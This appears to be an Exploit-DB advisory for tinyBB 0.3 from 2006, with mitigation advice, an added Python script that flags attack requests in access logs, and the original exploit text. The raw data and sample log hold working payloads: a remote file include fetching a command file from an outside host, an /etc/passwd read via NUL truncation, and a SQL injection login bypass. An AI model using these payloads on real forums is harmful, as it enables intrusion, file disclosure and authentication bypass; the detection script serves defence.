Vendor: tinyBB
By: nukedx
CVSS: 7.5 (HIGH)
CWE: 94, 98, 89
Product Name: tinyBB
Affected Version From: 0.3
Affected Version To: 0.3
Patch Exists: YES
CPE: a:tinybb:tinybb
Year: 2006

tinyBB <= 0.3 Multiple Remote Vulnerabilities

This exploit works on tinyBB <= 0.3 and covers three issues: a Remote File Include, a Local File Include, and a SQL injection. The Remote File Include lets an attacker make the vulnerable server include a file from a remote host, and the Local File Include lets an attacker make it include a file already on the server; both are reached through the tinybb_footers parameter of footers.php. The SQL injection lets an attacker inject SQL code through the username parameter of login.php.

Mitigation:

The best way to mitigate these vulnerabilities is to upgrade to the latest version of tinyBB. Additionally, it is recommended to use a web application firewall to protect against these types of attacks.
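
A log-review heuristic for the three request patterns this advisory lists, as an added example that is not part of the original advisory or of tinyBB. The log lines, IPs, hosts and tag names are constructed for illustration, and the patterns are a triage aid, not a complete filter.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (combined log format); IPs, hosts and paths are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [28/May/2006:10:00:01 +0000] "GET /forum/footers.php?tinybb_footers=http://example.invalid/x.txt? HTTP/1.1" 200 512
203.0.113.5 - - [28/May/2006:10:00:02 +0000] "GET /forum/footers.php?tinybb_footers=/etc/passwd%00 HTTP/1.1" 200 901
203.0.113.5 - - [28/May/2006:10:00:03 +0000] "GET /forum/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing HTTP/1.1" 200 330
198.51.100.7 - - [28/May/2006:10:00:04 +0000] "GET /forum/login.php?username=alice&password=secret HTTP/1.1" 302 0
198.51.100.7 - - [28/May/2006:10:00:05 +0000] "GET /forum/index.php HTTP/1.1" 200 4096
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
URL_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)
SQL_META = re.compile(r"/\*|--|['\"#;]")  # comment openers, quotes, statement separator


def classify(line):
    """Return the finding tags for one access-log line (empty list if clean)."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    findings = []
    # parse_qsl percent-decodes values, so %00 becomes a real NUL character here.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if script == "footers.php" and name == "tinybb_footers":
            if URL_SCHEME.match(value):
                findings.append("RFI")   # include path points at a remote URL
            elif "\x00" in value or value.startswith("/") or ".." in value:
                findings.append("LFI")   # NUL truncation, absolute path or traversal
        elif script == "login.php" and name == "username" and SQL_META.search(value):
            findings.append("SQLI")      # SQL metacharacters in the login name
    return findings


def scan(log_text):
    """Return (line_number, tag) pairs for every flagged line."""
    return [(n, tag) for n, line in enumerate(log_text.splitlines(), 1)
            for tag in classify(line)]


if __name__ == "__main__":
    for lineno, tag in scan(SAMPLE_LOG):
        print(f"line {lineno}: {tag}")
```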

Exploit-DB raw data:

tinyBB <= 0.3 Multiple Remote Vulnerabilities
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on tinyBB <= 0.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php
http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing
# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]